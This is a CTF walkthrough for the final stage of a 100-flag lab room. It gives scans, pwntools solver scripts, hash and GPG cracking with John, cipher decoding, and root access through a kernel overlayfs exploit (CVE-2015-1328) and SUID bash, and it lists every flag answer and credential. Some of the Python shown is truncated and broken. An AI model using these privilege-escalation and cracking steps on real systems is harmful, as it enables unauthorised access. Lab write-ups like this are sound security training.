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Stage 7

[Task 7] Final stage

The end has finally come and you deserve something better by reaching this far. Let me give you an applause

I would like to say a million thanks for all the time you have to spend and the brain cell you have lost. This is it, the last 20 flags.

This would be the longest CTF challenge in the THM server (or perhaps).

What? You are asking where is the deploy button? Silly me, you can’t find the button within this page. It is somehow hidden inside another page. (Don’t brute-force the page, this is unethical). Well, I can’t create the hidden room in THM, so just deploy the machine on the next two tasks.

#1 - Flag 81

Hint: Not bad, you finally found my first secret hideout. Here, take this flag 81: vrshl9t5w746fueyl1mw. Now, deploy the machine and start the challenge. Good luck. (Answer the flag in the CTF 100 room)

Go to [Task 8] Hidden CTF 100 and click “Deploy”.

Flag 81: vrshl9t5w746fueyl1mw

We have 2 machines to deploy here, addressing different flags:

Task 8

21/tcp   open  ftp     vsftpd 2.3.5
22/tcp   open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 26:70:49:8b:db:20:40:2a:e9:d8:81:e1:ff:7b:c6:17 (DSA)
|   2048 c3:b1:05:ef:8d:34:47:79:55:9d:a5:7b:fa:d0:82:ec (RSA)
|_  256 ae:cf:88:d3:de:fc:95:22:8f:c5:71:6e:08:ef:96:72 (ECDSA)
80/tcp   open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
3338/tcp open  anet-b?
| fingerprint-strings: 
|   DNSStatusRequestTCP: 
|     Decode all these base64 to reveal the flag and something extra
|     ZW1hbmF0aXZlbHk=
|     Wrong
|   DNSVersionBindReqTCP: 
|     Decode all these base64 to reveal the flag and something extra
|     S3Vt
|     Wrong
|   GenericLines: 
|     Decode all these base64 to reveal the flag and something extra
|     aWNodGh5b2dyYXBoeQ==
|     Wrong
|   GetRequest: 
|     Decode all these base64 to reveal the flag and something extra
|     Y3J1c2lsZQ==
|     Wrong
|   HTTPOptions: 
|     Decode all these base64 to reveal the flag and something extra
|     cHJpemVz
|     Wrong
|   Help: 
|     Decode all these base64 to reveal the flag and something extra
|     c3ViZ3JhbnVsYXJpdHk=
|     Wrong
|   Kerberos: 
|     Decode all these base64 to reveal the flag and something extra
|     b2Js
|     Wrong
|   NULL: 
|     Decode all these base64 to reveal the flag and something extra
|     aWNodGh5b2dyYXBoeQ==
|   RPCCheck: 
|     Decode all these base64 to reveal the flag and something extra
|     dW5jb21iaW5pbmduZXNz
|     Wrong
|   RTSPRequest: 
|     Decode all these base64 to reveal the flag and something extra
|     d2FuZ2xlcnM=
|     Wrong
|   SMBProgNeg: 
|     Decode all these base64 to reveal the flag and something extra
|     YnJvYWNo
|     Wrong
|   SSLSessionReq: 
|     Decode all these base64 to reveal the flag and something extra
|     c2xpcHBlZA==
|     Wrong
|   TLSSessionReq: 
|     Decode all these base64 to reveal the flag and something extra
|     Y29ybmllcg==
|     Wrong
|   TerminalServerCookie: 
|     Decode all these base64 to reveal the flag and something extra
|     cmV3ZWxkcw==
|     Wrong
|   X11Probe: 
|     Decode all these base64 to reveal the flag and something extra
|     VGV1dGhpcw==
|_    Wrong
3404/tcp open  unknown
| fingerprint-strings: 
|   DNSStatusRequestTCP: 
|     Perform arithmetic, connection close if failed to solve within 3 seconds
|     minus 67
|     Wrong number
|   DNSVersionBindReqTCP: 
|     Perform arithmetic, connection close if failed to solve within 3 seconds
|     minus 83
|     Wrong number
|   GenericLines: 
|     Perform arithmetic, connection close if failed to solve within 3 seconds
|     multiply 1
|     Wrong number
|   GetRequest, Kerberos: 
|     Perform arithmetic, connection close if failed to solve within 3 seconds
|     minus 89
|     Wrong number
|   HTTPOptions: 
|     Perform arithmetic, connection close if failed to solve within 3 seconds
|     multiply 58
|     Wrong number
|   Help: 
|     Perform arithmetic, connection close if failed to solve within 3 seconds
|     minus 61
|     Wrong number
|   NULL: 
|     Perform arithmetic, connection close if failed to solve within 3 seconds
|     minus 89
|   RPCCheck, RTSPRequest, SSLSessionReq: 
|     Perform arithmetic, connection close if failed to solve within 3 seconds
|     Wrong number
|   TLSSessionReq: 
|     Perform arithmetic, connection close if failed to solve within 3 seconds
|     minus 88
|     Wrong number
|   TerminalServerCookie: 
|     Perform arithmetic, connection close if failed to solve within 3 seconds
|     minus 25
|_    Wrong number

Task 9

21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
9999/tcp open  abyss?
| fingerprint-strings: 
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, JavaRMI: 
|     ***************************
|     Port knocking input *
|     ***************************
|     user, please enter the port sequence
|     format is (can be more than 4): PORT PORT PORT PORT
|     Wrong sequence
|     Bye!
|   NULL: 
|     ***************************
|     Port knocking input *
|     ***************************
|     user, please enter the port sequence
|_    format is (can be more than 4): PORT PORT PORT PORT

#2 - Flag 82

When you connect with, you are asked to solve a base64 challenge. If the result is not provided within 3 seconds, the connection is closed. Once the correct result is provided, another challenge is asked and so on… until the challenge is the flag.

I wrote the following python script to automatize the process and get the flag, as well as the FTP user:

#!/usr/bin/env python3

from pwn import *
from base64 import b64decode

host, port = '', 3338
context.log_level = 'warn'

s = remote(host, port)

while True:

    b64enc = s.recvline()
    b64enc = b64enc.decode('utf-8')

    if 'flag' in b64enc:
        # get the FTP user

    b64dec = b64decode(b64enc)


Let’s run the script:

$ python 
flag 82: arvqv50ejexyzyi3j3xp

b'Congratz, here something for you\n'
b'FTP user: get_laid\n'

We now have a FTP user: get_laid, as well as the flag.

Flag 82: arvqv50ejexyzyi3j3xp

#3 - Flag 83

When you connect with, you are prompted for a math computation involving addition, substraction or multiplication. If the result is not provided within 3 seconds, the connection is closed. Once the correct result is provided, another computation is required and so on… until the challenge is the flag.

I wrote the following python script to automatize the process and get the flag:

#!/usr/bin/env python3

from pwn import *
import re

host, port = '', 3404
context.log_level = 'warn'

s = remote(host, port)

while True:

    op = s.recvline()
    op = op.decode('utf-8')
    if 'flag' in op:

    reop ='^(\d+)\s(minus|add|multiply)\s(\d+)\\n$', op, re.IGNORECASE)
    n1 = int(
    sgn =
    n2 = int(
    if sgn == 'add':
        res = n1 + n2
    elif sgn == 'minus':
        res = n1 - n2
        res = n1 * n2



Let’s run it. After some seconds, we have the flag and a SSH user (hidden):

$ python 
flag 83: xte0xvb4b9uygmhji7o3

b'Congratz, here something for you\n'
b'SSH user: hidden\n'

#4 - Flag 84

Hint: John is ready for action.

At this stage, we have a FTP user (get_laid) and a SSH user (hidden). We are provided with a hint that refers to John the Ripper, used to crack hashes. But we don’t have hashes.

I tried to brute force FTP and SSH but without success and decided to try the web service. I was able to continue until flag86 where I have been provided with the SSH password. I’m not sure if this was the correct way of solving this but I did it :)

In a nutshell (details are explained in the next flags):

flag 84: qwpcsa9xh4hasczq1c1r

#5 - Flag 85

Hint: That is not a base64. A hash, perhaps.

Let’s try to do something from the web server:

$ /data/src/dirsearch/ -u -E -w /data/src/wordlists/directory-list-2.3-medium.txt 

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 220529

Error Log: /data/src/dirsearch/logs/errors-20-05-26_18-11-10.log


[18:11:10] Starting: 
[18:11:10] 200 -  177B  - /index
[18:11:10] 200 -  177B  - /
[18:11:13] 403 -  283B  - /.hta
[18:12:31] 301 -  311B  - /hidden  ->
[18:21:04] 403 -  292B  - /server-status

Task Completed

dirsearch has found a /hidden directory:

$ curl -s

<p>Username and password please</p>
<form action="" method="POST">
<input type="text" name="user"/>
<input type="text" name="pass"/><br>
<input type="submit" name="submit"/> 
<!-- ac0d0a292a3725daf32d58083e8e194c:8dbdda48fb8748d6746f1965824e966a -->
<!-- this is a base64 -->

Looking for the hashes confirms that they are MD5 hashes:

Field Hash Algo Decrypted
user ac0d0a292a3725daf32d58083e8e194c md5 lay
pass 8dbdda48fb8748d6746f1965824e966a md5 simple

Let’s authenticate with these credentials:

$ curl -d "user=lay&pass=simple&submit=submit" -X POST

<p>Username and password please</p>
<form action="" method="POST">
<input type="text" name="user"/>
<input type="text" name="pass"/><br>
<input type="submit" name="submit"/> 
MD5 hash easy peasy. The flag85: a0ml0wkiis5c9291e5cr. Also, FTP pass: zq9vpxdxzj3i0ml2i9mz<!-- ac0d0a292a3725daf32d58083e8e194c:8dbdda48fb8748d6746f1965824e966a -->
<!-- this is a base64 -->

We are provided with flag85 and a FTP password: zq9vpxdxzj3i0ml2i9mz.

Flag85: a0ml0wkiis5c9291e5cr

#6 - Flag 86

We now also have the FTP password (zq9vpxdxzj3i0ml2i9mz) of the FTP user (get_laid) previously found. Let’s connect and get the file:

$ ftp
Connected to (
220 (vsFTPd 2.3.5)
Name ( get_laid
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
227 Entering Passive Mode (10,10,212,86,202,91).
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Oct 05  2019 .
drwxr-xr-x    2 0        0            4096 Oct 05  2019 ..
-rw-r--r--    1 1000     1000          105 Oct 05  2019 secret.txt.gpg
226 Directory send OK.
ftp> get secret.txt.gpg

The secret file is a GPG symetrically encrypted file, which means we should be able to crack it.

$ file secret.txt.gpg 
secret.txt.gpg: GPG symmetrically encrypted data (CAST5 cipher)

Let’s use John:

$ /data/src/john/run/gpg2john secret.txt.gpg > gpg.hash
$ /data/src/john/run/john --wordlist=/data/src/wordlists/rockyou.txt gpg.hash
Note: This format may emit false positives, so it will keep trying even after finding a
possible candidate.
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 3 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
yuridia1989      (?)
go               (?)
2g 0:00:08:24 DONE (2020-05-27 21:25) 0.003962g/s 28422p/s 28422c/s 28422C/s                   ..*7¡Vamos!
Session completed. 

Failed with the 1st password but worked for go:

$ gpg --decrypt secret.txt.gpg 
gpg: directory '/home/unknown/.gnupg' created
gpg: keybox '/home/unknown/.gnupg/pubring.kbx' created
gpg: CAST5 encrypted data
gpg: encrypted with 1 passphrase
flag 84: qwpcsa9xh4hasczq1c1r

SSH pass: this_is_hidden

At this stage, I was able to get flag 84.

Let’s connect with the SSH service and get the flag.

get_laid@ubuntu:/home/hidden$ cat /home/hidden/flag86.txt 
Time to root the flag. Hint: something is awfully outdated.

flag86: pkjv1a9uaqe1qjd8z81g

#7 - Flag 87

We are told in the previous question that “something is awfully outdated” (see the hint just above the flag), and this is true:

get_laid@ubuntu:/tmp$ uname -a
Linux ubuntu 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux

Searching for privilege escalation vulnerabilities affecting kernel in 3.13.0, I found this (CVE-2015-1328): Upload the ofs.c script to the server, compile it, and run it to get root access.

get_laid@ubuntu:/tmp$ gcc ofs.c -o ofs
get_laid@ubuntu:/tmp$ ./ofs 
spawning threads
mount #1
mount #2
child threads done
/etc/ created
creating shared library
# whoami
root@ubuntu:/tmp# cd /root/
root@ubuntu:/root# ll
total 28
drwx------  3 root root 4096 Dec 13 05:26 ./
drwxr-xr-x 22 root root 4096 Oct  5  2019 ../
-rw-------  1 root root  538 Oct  5  2019 .bash_history
-rw-r--r--  1 root root 3106 Apr 19  2012 .bashrc
drwx------  2 root root 4096 Oct  5  2019 .gnupg/
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
-rw-rw-r--  1 root root   67 Dec 13 05:26 ready.txt
root@ubuntu:/root# cat ready.txt 
Ready for final stage?

flag87: 4qo9ik16rx8e8lk71vx3

#8 - Flag 88

Hint: tap tap tap tap

From here, we have to switch to the second server, available within Task #9.

On the 2nd server, there is a FTP service that allows anonymous connections (BTW, it only allows anonymous connections). Let’s get the files:

$ ftp
Connected to (
220 (vsFTPd 3.0.3)
Name ( anonymous
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
227 Entering Passive Mode (10,10,122,45,47,165).
receive aborted
waiting for remote to finish abort
ftp> passive
Passive mode off.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Oct 06  2019 .
drwxr-xr-x    2 0        0            4096 Oct 06  2019 ..
-rw-r--r--    1 0        0             199 Oct 06  2019 flag88
-rw-r--r--    1 0        0              70 Oct 06  2019 flag89
-rw-r--r--    1 0        0              55 Oct 06  2019 flag90
-rw-r--r--    1 0        0              58 Oct 06  2019 flag91
-rw-r--r--    1 0        0              56 Oct 06  2019 flag92
-rw-r--r--    1 0        0            1512 Oct 06  2019 flag93
-rw-r--r--    1 0        0            4235 Oct 06  2019 flag94
-rw-r--r--    1 0        0            1475 Oct 06  2019 flag95
226 Directory send OK.
ftp> mget *

The first file is for flag88. It’s a morse like code, but only with dots. Besides, we see double spaces every 2 groups.

$ cat flag88 
... .  ..... ...  ..... .....  ... ..  .... ..  . .....  .... ..  . ...  .... .  ... ....  .... .  .... ....  . ..  . .....  .... ..  ..... ..  ..... ....  . .....  ..... .....  ..... .

port?: 7177

Decode Tap code with I first tried with the following alphabet:


which resulted in the following flag:


This flag did not work. I tried to switch “C” with “K” in the alphabet:


which resulted in the following flag, which worked:


We are also provided with a port (7177), probably part of the port knocking sequence. Let’s keep it for later.


#9 - Flag 89

Hint: German ADFGVX

Use to decrypt the ADFGVX cipher with the key end.

$ cat flag89 
dfxxf afada fgfdx agxdg xagdg daxda dggag fffad


port?: 7994

We are provided with a port (7994), probably part of the port knocking sequence. Let’s keep it for later.

Flag 89: mmia1m1ottstckniqdhn

#10 - Flag 90

Hint: What a fair cipher

$ cat flag90 

key: Gravity Falls
port?: 7885

We are provided with a port (7885), probably part of the port knocking sequence. Let’s keep it for later.

This is a PLAYFAIR cipher.

$ echo "CLGQWIWHRSSXSZEVRIMCZX" | sed "s/X//g"


#11 - Flag 91

Hint: encode name starts with X

$ cat flag91 

XXDECODE it with

We are provided with a port (9932), probably part of the port knocking sequence. Let’s keep it for later.

flag 91: mgdhdxh0km97qm4bpq82
port?: 9932

#12 - Flag 92

Hint: encode name starts with U

$ cat flag92 
H9FQA9SDR.B!F;W5U<'1H;3!U=C$T96PR8W Q, IP;W)T/SH@-C8Q,@

UUDECODE with the uudecode command. Specific header and footer are expected.

$ uudecode 
begin 644 flag92
H9FQA9SDR.B!F;W5U<'1H;3!U=C$T96PR8W Q, IP;W)T/SH@-C8Q,@
$ cat flag92 
flag92: fouupthm0uv14el2cp10
port?: 6612 

We are provided with a port (6612), probably part of the port knocking sequence. Let’s keep it for later.

#13 - Flag 93

Hint: encode name starts with P

$ cat flag93
#!/usr/bin/perl -w
length q rmdir and print chr ord qw q fcntl q and print chr ord qw q lc q and print chr ord q each ne and print chr ord qw q glob q and print chr ord q q eq and print chr oct oct ord q mkdir m and print chr oct oct ord uc q cmp lc and print chr oct ord uc q chr uc and print chr ord q q eq and print chr ord qw q use q and print chr ord qw q le q and print chr ord q ref or and print chr ord q open no and print chr length q q splice srand getservbyname setnetent ne reset endprotoent foreach scalar rewinddir cos setnetent not else getprotobyname q and print chr ord q local and print chr oct ord uc q oct no and print chr oct ord uc qw q ge q and print chr ord q tie lt and print chr hex ord q q eq and print chr ord qw q uc q and print chr ord q chop uc and print chr ord q eq ge and print chr hex ord q q eq and print chr ord q ge log and print chr oct oct ord uc q cmp lc and print chr ord q my alarm and print chr ord qw q warn q and print chr length q x rename sethostent srand pack pipe setpwent syscall else eq split sleep endservent qw require symlink ne keys ord require x and print chr ord q qr q and print chr length q continue vec and print chr ord q split s and print chr ord q pop and print chr ord q qr q and print chr ord q gt log and print chr oct ord uc q rmdir and print chr oct ord uc q chr uc and print chr ord qq q q and print chr oct oct oct ord q eq ge and print chr oct oct oct ord q eq ne and print chr oct oct ord uc q cmp lc and print chr oct oct ord uc q else 

Just execute the script:

$ perl flag93 
flag 93: ulepzo79i2uhq2e3ywzr
port?: 1132

#14 - Flag 94

Hint: encode name starts with A

$ cat flag94 
゚ω゚ノ= /`m´)ノ ~┻━┻   //*´∇`*/ ['_']; o=(゚ー゚)  =_=3; c=(゚Θ゚) =(゚ー゚)-(゚ー゚); (゚Д゚) =(゚Θ゚)= (o^_^o)/ (o^_^o);(゚Д゚)={゚Θ゚: '_' ,゚ω゚ノ : ((゚ω゚ノ==3) +'_') [゚Θ゚] ,゚ー゚ノ :(゚ω゚ノ+ '_')[o^_^o -(゚Θ゚)] ,゚Д゚ノ:((゚ー゚==3) +'_')[゚ー゚] }; (゚Д゚) [゚Θ゚] =((゚ω゚ノ==3) +'_') [c^_^o];(゚Д゚) ['c'] = ((゚Д゚)+'_') [ (゚ー゚)+(゚ー゚)-(゚Θ゚) ];(゚Д゚) ['o'] = ((゚Д゚)+'_') [゚Θ゚];(゚o゚)=(゚Д゚) ['c']+(゚Д゚) ['o']+(゚ω゚ノ +'_')[゚Θ゚]+ ((゚ω゚ノ==3) +'_') [゚ー゚] + ((゚Д゚) +'_') [(゚ー゚)+(゚ー゚)]+ ((゚ー゚==3) +'_') [゚Θ゚]+((゚ー゚==3) +'_') [(゚ー゚) - (゚Θ゚)]+(゚Д゚) ['c']+((゚Д゚)+'_') [(゚ー゚)+(゚ー゚)]+ (゚Д゚) ['o']+((゚ー゚==3) +'_') [゚Θ゚];(゚Д゚) ['_'] =(o^_^o) [゚o゚] [゚o゚];(゚ε゚)=((゚ー゚==3) +'_') [゚Θ゚]+ (゚Д゚) .゚Д゚ノ+((゚Д゚)+'_') [(゚ー゚) + (゚ー゚)]+((゚ー゚==3) +'_') [o^_^o -゚Θ゚]+((゚ー゚==3) +'_') [゚Θ゚]+ (゚ω゚ノ +'_') [゚Θ゚]; (゚ー゚)+=(゚Θ゚); (゚Д゚)[゚ε゚]='\\'; (゚Д゚).゚Θ゚ノ=(゚Д゚+ ゚ー゚)[o^_^o -(゚Θ゚)];(o゚ー゚o)=(゚ω゚ノ +'_')[c^_^o];(゚Д゚) [゚o゚]='\"';(゚Д゚) ['_'] ( (゚Д゚) ['_'] (゚ε゚+/*´∇`*/(゚Д゚)[゚o゚]+ (゚Д゚)[゚ε゚]+(゚Θ゚)+(゚ー゚)+((o^_^o) +(o^_^o))+(゚Д゚)[゚ε゚]+(゚Θ゚)+((゚ー゚) + (゚Θ゚))+(゚ー゚)+(゚Д゚)[゚ε゚]+(゚Θ゚)+(゚ー゚)+(゚Θ゚)+(゚Д゚)[゚ε゚]+(゚Θ゚)+(゚ー゚)+((゚ー゚) + (o^_^o))+(゚Д゚)[゚ε゚]+(゚ー゚)+(c^_^o)+(゚Д゚)[゚ε゚]+((゚ー゚) + (o^_^o))+(゚Θ゚)+(゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+(゚ー゚)+(゚Д゚)[゚ε゚]+((゚ー゚) + (o^_^o))+((o^_^o) - (゚Θ゚))+(゚Д゚)[゚ε゚]+(゚ー゚)+(c^_^o)+(゚Д゚)[゚ε゚]+(゚Θ゚)+(゚ー゚)+(o^_^o)+(゚Д゚)[゚ε゚]+(゚Θ゚)+((o^_^o) +(o^_^o))+(゚Θ゚)+(゚Д゚)[゚ε゚]+(゚Θ゚)+(゚ー゚)+((o^_^o) +(o^_^o))+(゚Д゚)[゚ε゚]+(゚Θ゚)+(゚ー゚)+((o^_^o) - (゚Θ゚))+(゚Д゚)[゚ε゚]+(゚Θ゚)+((o^_^o) +(o^_^o))+((o^_^o) +(o^_^o))+(゚Д゚)[゚ε゚]+((゚ー゚) + (o^_^o))+(゚Θ゚)+(゚Д゚)[゚ε゚]+(゚Θ゚)+(゚ー゚)+((o^_^o) +(o^_^o))+(゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+(゚Θ゚)+(゚Д゚)[゚ε゚]+(゚Θ゚)+((゚ー゚) + (゚Θ゚))+((゚ー゚) + (゚Θ゚))+(゚Д゚)[゚ε゚]+(゚Θ゚)+(゚ー゚)+((o^_^o) - (゚Θ゚))+(゚Д゚)[゚ε゚]+(゚Θ゚)+(゚ー゚)+((゚ー゚) + (o^_^o))+(゚Д゚)[゚ε゚]+(゚Θ゚)+((゚ー゚) + (o^_^o))+((o^_^o) - (゚Θ゚))+(゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+(゚ー゚)+(゚Д゚)[゚ε゚]+(゚Θ゚)+((o^_^o) +(o^_^o))+((゚ー゚) + (o^_^o))+(゚Д゚)[゚ε゚]+(゚Θ゚)+((o^_^o) +(o^_^o))+(o^_^o)+(゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+((o^_^o) - (゚Θ゚))+(゚Д゚)[゚ε゚]+(゚Θ゚)+((゚ー゚) + (゚Θ゚))+(゚ー゚)+(゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+((゚ー゚) + (o^_^o))+(゚Д゚)[゚ε゚]+(゚Θ゚)+(゚ー゚)+(゚Θ゚)+(゚Д゚)[゚ε゚]+((o^_^o) +(o^_^o))+(゚Θ゚)+(゚Д゚)[゚ε゚]+(゚Θ゚)+((o^_^o) - (゚Θ゚))+(゚Д゚)[゚ε゚]+(゚Θ゚)+((o^_^o) +(o^_^o))+(o^_^o)+(゚Д゚)[゚ε゚]+(゚Θ゚)+((o^_^o) +(o^_^o))+(o^_^o)+(゚Д゚)[゚ε゚]+(゚Θ゚)+((゚ー゚) + (゚Θ゚))+(c^_^o)+(゚Д゚)[゚ε゚]+(゚ー゚)+(c^_^o)+(゚Д゚)[゚ε゚]+(゚Θ゚)+((o^_^o) +(o^_^o))+((゚ー゚) + (゚Θ゚))+(゚Д゚)[゚ε゚]+(゚Θ゚)+((o^_^o) +(o^_^o))+(o^_^o)+(゚Д゚)[゚ε゚]+(゚Θ゚)+(゚ー゚)+((゚ー゚) + (゚Θ゚))+(゚Д゚)[゚ε゚]+(゚Θ゚)+((o^_^o) +(o^_^o))+((o^_^o) - (゚Θ゚))+(゚Д゚)[゚ε゚]+((゚ー゚) + (o^_^o))+((o^_^o) - (゚Θ゚))+(゚Д゚)[゚ε゚]+(゚ー゚)+(c^_^o)+(゚Д゚)[゚ε゚]+(゚Θ゚)+(゚ー゚)+((゚ー゚) + (o^_^o))+(゚Д゚)[゚ε゚]+(゚Θ゚)+((o^_^o) +(o^_^o))+((゚ー゚) + (゚Θ゚))+(゚Д゚)[゚ε゚]+(゚Θ゚)+(゚ー゚)+((゚ー゚) + (゚Θ゚))+(゚Д゚)[゚ε゚]+(゚Θ゚)+((o^_^o) +(o^_^o))+(o^_^o)+(゚Д゚)[゚ε゚]+(゚Θ゚)+((o^_^o) +(o^_^o))+(゚ー゚)+(゚Д゚)[゚o゚]) (゚Θ゚)) ('_');

Decode AAENCODE with

flag 94: cqfbv9f1mbgz4ws2l7a1
ssh user: guest

#15 - Flag 95

Hint: encode name starts with J

$ cat flag95 

Decode this JSFUCK with

flag 95 is qy0q5l4yuob55ojq3t3z
and ssh pass is this_is_the_end

#16 - Flag 96

Let’s unlock the SSH port with our sequence from the ports collected (flags #88 to #93):

$ nc 9999
*   Port knocking input   *
Hi user, please enter the port sequence
The format is (can be more than 4): PORT PORT PORT PORT
> 7177 7994 7885 9932 6612 1132
Something happen
Good luck!

After scanning with Nmap, it’s confirmed that a new port is now open on the server (22).

Now let’s connect with the SSH credentials (username gather in flag94 and password from flag95):

$ sshpass -p "this_is_the_end" ssh [email protected]
$ /bin/bash
bash-4.4$ ls -la
total 32
drwxr-xr-x 4 guest guest 4096 Oct  6  2019 .
drwxr-xr-x 4 root  root  4096 Oct  5  2019 ..
-rw-r--r-- 1 guest guest  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 guest guest 3771 Apr  4  2018 .bashrc
drwx------ 2 guest guest 4096 Oct  6  2019 .cache
-rw-r--r-- 1 guest guest   21 Oct  6  2019 flag96
drwx------ 3 guest guest 4096 Oct  6  2019 .gnupg
-rw-r--r-- 1 guest guest  807 Apr  4  2018 .profile
bash-4.4$ cat flag96 

Flag96: obnsgucziinvx55rkns1

#17 - Flag 97

Hint: It is essential to check the privilege.

Checking our privileges reveals flag97:

$ sudo -l
[sudo] password for guest: 
Matching Defaults entries for guest on final_destination:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User guest may run the following commands on final_destination:
    (root) /nice_try_but_wrong_path/flag97_usz5rxyulqswfvsd3k1y

Flag97: usz5rxyulqswfvsd3k1y

#18 - Flag 98

Let’s search for SUID files/executables owned by root:

$ find / -type f -user root -perm -u=s -executable 2>/dev/null
/bin/bash     <------------------ interesting!

/bin/bash is a good candidate for a privilege escalation as it is owned by root and has the SUID bit set:

$ ls -l /bin/bash 
-rwsr-xr-x 1 root root 1113504 Jun  6  2019 /bin/bash

Time to get root access:

$ bash -p
bash-4.4# whoami

Let’s read the flag in theend’s home directory:

bash-4.4# cat /home/theend/flag98 

#19 - Flag 99

Hint: Something call scheduler.

bash-4.4# cat /root/flag99 
Flag 99 is controlled by time
bash-4.4# crontab -l
no crontab for guest
bash-4.4# cat /var/spool/cron/crontabs/root 
#flag99: rlucbw9qw3wkn43evf29
#congratulation on getting this far. If you are stuck with flag100, let me give you a hint.
#Hint: somewhere inside tryhackme website. The flag is easy but not obvious.
#Please, do not brute force or attack the site. Just find it.

Flag99: rlucbw9qw3wkn43evf29

#20 - Flag 100

Hint: The flag is outside of the machine. Somewhere called /p/ in THM

Go to the author’s home page ( Flag 100 is here :)

Flag 100: 1bzx8d959xy8t18rxsri